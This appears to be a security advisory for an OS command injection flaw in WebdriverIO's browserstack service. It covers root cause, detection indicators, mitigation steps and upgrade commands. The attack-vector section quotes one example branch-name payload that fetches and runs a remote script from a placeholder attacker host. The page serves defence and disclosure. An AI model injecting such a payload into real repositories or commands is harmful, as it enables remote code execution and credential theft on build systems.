CVE-2026-25244 Overview
CVE-2026-25244 is a command injection vulnerability [CWE-78] in WebdriverIO, a test automation framework used for unit, end-to-end, and component testing with WebDriver, WebDriver BiDi, and Appium. Versions below 9.24.0 of the wdio-browserstack-service package interpolate Git branch names directly into execSync() calls without sanitization. Attackers can supply a malicious repository whose branch name contains shell metacharacters, triggering arbitrary command execution during test orchestration. Exploitation enables remote code execution (RCE) on CI/CD servers and developer workstations. The maintainers fixed the issue in version 9.24.0.
Critical Impact
Attackers can achieve remote code execution on CI/CD pipelines and developer machines, enabling credential theft, source code exfiltration, SSH key disclosure, and supply chain compromise through tampered build artifacts.
Affected Products
- WebdriverIO wdio-browserstack-service versions below 9.24.0
- Node.js environments consuming the OpenJS Foundation webdriverio package
- CI/CD pipelines and developer workstations running affected WebdriverIO versions
Discovery Timeline
- 2026-05-18 - CVE-2026-25244 published to NVD
- 2026-05-19 - Last updated in NVD database
Technical Details for CVE-2026-25244
Vulnerability Analysis
The vulnerability resides in the getGitMetadataForAISelection() helper function within packages/wdio-browserstack-service/src/testorchestration/helpers.ts. The function retrieves Git metadata, including the current branch name, and embeds the value directly into a shell command executed via execSync(). Because Git permits branch names containing shell metacharacters such as backticks, semicolons, and dollar-sign command substitution, any branch name reaching this code path is treated as executable shell input.
When a WebdriverIO test run loads a repository configured through testOrchestrationOptions.runSmartSelection.source, or falls back to the current working directory, the framework reads the branch name from that repository. A branch name crafted to inject shell syntax executes attacker-controlled commands with the privileges of the test runner.
Root Cause
The root cause is missing input sanitization on Git-derived strings before passing them to a shell-interpreted execution function. The implementation relied on Git metadata being trusted text, but Git's permissive branch-name validation allows characters that the shell interprets as command separators or substitutions. This maps directly to CWE-78, OS Command Injection.
Attack Vector
An attacker hosts or contributes a repository containing a branch with a malicious name, for example a name embedding $(curl attacker.example/payload | sh). When a developer or CI system runs WebdriverIO with smart selection enabled against that repository, getGitMetadataForAISelection() interpolates the branch name into the shell command. The shell evaluates the injected payload before completing the intended Git operation, yielding code execution in the test runner's context. No authentication or user interaction beyond running the test suite is required.
No verified public exploit code is available. Refer to the GitHub Security Advisory GHSA-5c46-x3qw-q7j7 and the vulnerable helper source for the affected code path.
Detection Methods for CVE-2026-25244
Indicators of Compromise
- Unexpected child processes spawned by node running WebdriverIO, such as sh, curl, wget, or bash invoking outbound connections during test runs
- Outbound network connections from CI runners to unknown hosts during the test orchestration phase
- Git repositories containing branch names with shell metacharacters such as `, $(, ;, &&, or |
- Access to ~/.ssh/, .npmrc, environment variable dumps, or CI secret files from test processes
Detection Strategies
- Inventory package.json and lockfiles across repositories for webdriverio or @wdio/browserstack-service versions below 9.24.0
- Audit Git histories for branch names containing shell metacharacters using git for-each-ref --format='%(refname)'
- Monitor process trees on CI/CD agents for shell processes whose parent is the Node.js test runner
Monitoring Recommendations
- Alert on egress traffic from build agents to non-allowlisted destinations during WebdriverIO test execution
- Log and review all execSync and child_process invocations originating from test orchestration tooling
- Track access to credential stores, cloud metadata endpoints, and SSH key paths from test runner processes
How to Mitigate CVE-2026-25244
Immediate Actions Required
- Upgrade WebdriverIO and @wdio/browserstack-service to version 9.24.0 or later across all projects and CI pipelines
- Rotate any secrets, API tokens, and SSH keys accessible to CI runners or developer workstations that executed vulnerable versions against untrusted repositories
- Audit recent test runs for anomalous child processes or outbound connections and treat confirmed exploitation as a full system compromise
Patch Information
The maintainers fixed CVE-2026-25244 in WebdriverIO version 9.24.0. See the GitHub WebdriverIO Release v9.24.0 for release notes and the GitHub Security Advisory GHSA-5c46-x3qw-q7j7 for advisory details. The fix sanitizes Git-derived metadata before passing it to shell execution.
Workarounds
- Disable testOrchestrationOptions.runSmartSelection in WebdriverIO configuration until upgrading
- Restrict test runs to trusted repositories and avoid executing WebdriverIO against attacker-influenced branches
- Run CI test jobs in ephemeral, network-restricted containers with least-privilege credentials to limit blast radius
# Upgrade WebdriverIO to the patched version
npm install webdriverio@^9.24.0 @wdio/browserstack-service@^9.24.0 --save-dev
# Verify installed version
npm ls webdriverio
# Audit branch names for shell metacharacters
git for-each-ref --format='%(refname:short)' refs/heads/ | grep -E '[\$\`;&|()]'
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
